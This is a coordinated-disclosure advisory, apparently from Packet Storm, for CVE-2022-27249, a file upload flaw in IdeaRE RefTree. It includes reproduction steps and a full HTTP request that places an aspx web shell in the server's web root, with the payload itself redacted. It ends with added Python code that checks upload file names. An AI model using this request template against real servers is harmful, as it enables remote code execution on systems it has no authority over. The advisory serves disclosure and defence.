CVE-2022-27249: IdeaRE RefTree Shell Upload ≈ Packet Storm

An unrestricted file upload vulnerability in IdeaRE RefTree before 2021.09.17 allows remote authenticated users to execute arbitrary code by using UploadDwg to upload a crafted aspx file to the web root, and then visiting the URL for this aspx resource.

===============================================================================
                  title: IdeaRE RefTree Remote Code Execution
                product: IdeaRE RefTree < 2021.09.17
     vulnerability type: Unrestricted File Upload
                 CVE ID: CVE-2022-27249
               severity: High
           CVSSv3 score: 8.8
          CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
                  found: 2021-09-13
                     by: Savino Sisco [email protected]
===============================================================================

[EXECUTIVE SUMMARY]

RefTree is a web application made for managing complex real estate situations.
Among other features, it offers the possibility for authenticated users
to upload and download DWG (CAD drawings) files for buildings.

During a penetration test activity, an "Unrestricted File Upload" vulnerability
was found which leverages the upload feature to upload a file anywhere on the
target system.

By uploading a malicious web page, like an aspx web shell, to the server's
web root it is possible to achieve code execution by just navigating to the
malicious page with a web browser.

[VULNERABLE VERSIONS]

IdeaRE RefTree < 2021.09.17

[TECHNICAL DETAILS]

It is possible to reproduce the issue following these steps:

1. Log into the application to get a valid session cookie
2. Get a valid "ObjId" from the application (the ID of a building to associate
   the file to)
3. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/UploadDwg'
   to upload a file on the target system, for example a web shell in the
   server's web root
4. Navigate to the new page with a web browser to trigger code execution

Example of the HTTP request to the Upload endpoint:

POST /CaddemServiceJS/CaddemService.svc/rest/UploadDwg HTTP/2
Host: [REDACTED]
Cookie: ASP.NET_SessionId=b1125gke23enpul1ukeu1ouy
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 2211
Origin: https://[REDACTED]
Referer: https://[REDACTED]/Reftreespace/

{
  "FileContent": "[BASE64_PAYLOAD]",
  "DwgName": "C:\\inetpub\\wwwroot\\webshell.aspx",
  "UploadType": "WorkingCopy",
  "ObjId": 4774726,
  "ObjType": 5,
  "UpdateState": true,
  "DwgOp": 23
}

HTTP/2 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: [REDACTED]
X-Powered-By: ASP.NET
Date: Fri, 10 Sep 2021 15:00:53 GMT
Content-Length: 24

{"UploadDwgResult":null}

[VULNERABILITY REFERENCE]

The following CVE ID was allocated to track the vulnerabilities:
CVE-2022-27249

[DISCLOSURE TIMELINE]

2021-09-13  Vulnerability disclosed to our customer and the vendor.
            Vendor acknowledged the issue.
2021-09-17  Vendor released a fix for the software.
2021-10-15  The vulnerability was rechecked in the newer version to confirm
            that it was indeed fixed.
2022-03-15  Researcher requested to publicly disclose the issue; public
            coordinated disclosure.

[RESOLUTION]

Update the software to a version >= 2021.09.17

Savino Sisco <[email protected]>
https://www.linkedin.com/in/savino-sisco/
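
The request above succeeds because the server honours a client-supplied "DwgName" as a full destination path. The following is an added example, not code from the advisory or from the vendor's fix: a sketch of the server-side check that treats "DwgName" as a bare file name only, reusable to audit logged request bodies. The storage root, the naming policy and all function names are assumptions.

```python
import json
import re
from pathlib import PureWindowsPath  # parses Windows paths on any host OS

# Assumed policy (not the vendor's): bare file name, conservative charset, .dwg only.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9 _-]{0,99}\.dwg", re.IGNORECASE)
# Hypothetical storage directory, deliberately outside the IIS web root.
UPLOAD_ROOT = PureWindowsPath(r"D:\RefTreeData\dwg")

def check_dwg_name(dwg_name):
    """Return the reasons a DwgName must be rejected (empty list = acceptable)."""
    if not isinstance(dwg_name, str) or not dwg_name:
        return ["DwgName missing or not a string"]
    p = PureWindowsPath(dwg_name)
    reasons = []
    if p.drive or p.root:
        reasons.append("absolute path or drive letter")
    if len(p.parts) > 1:
        reasons.append("contains directory components")
    if p.suffix.lower() != ".dwg":
        reasons.append("extension is not .dwg")
    # Catches names such as "shell.aspx;.dwg" that pass the checks above.
    if not reasons and not SAFE_NAME.fullmatch(dwg_name):
        reasons.append("characters outside the allowlist")
    return reasons

def storage_path(obj_id, dwg_name):
    """Server-chosen destination; the client contributes only a validated name."""
    if check_dwg_name(dwg_name):
        raise ValueError("rejected DwgName")
    return UPLOAD_ROOT / str(int(obj_id)) / dwg_name

def audit_bodies(bodies):
    """Flag logged UploadDwg JSON bodies whose DwgName would be rejected."""
    findings = []
    for raw in bodies:
        name = json.loads(raw).get("DwgName")
        reasons = check_dwg_name(name)
        if reasons:
            findings.append((name, reasons))
    return findings

# Constructed sample bodies; the second reuses the DwgName shown in the advisory.
SAMPLES = [json.dumps({"DwgName": n, "ObjId": 4774726}) for n in (
    "floor-2.dwg", r"C:\inetpub\wwwroot\webshell.aspx", r"..\..\plan.dwg")]

if __name__ == "__main__":
    for name, reasons in audit_bodies(SAMPLES):
        print(f"REJECT {name!r}: {', '.join(reasons)}")
```

Name validation alone does not replace the update in [RESOLUTION]; it illustrates the class of check whose absence the advisory describes.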
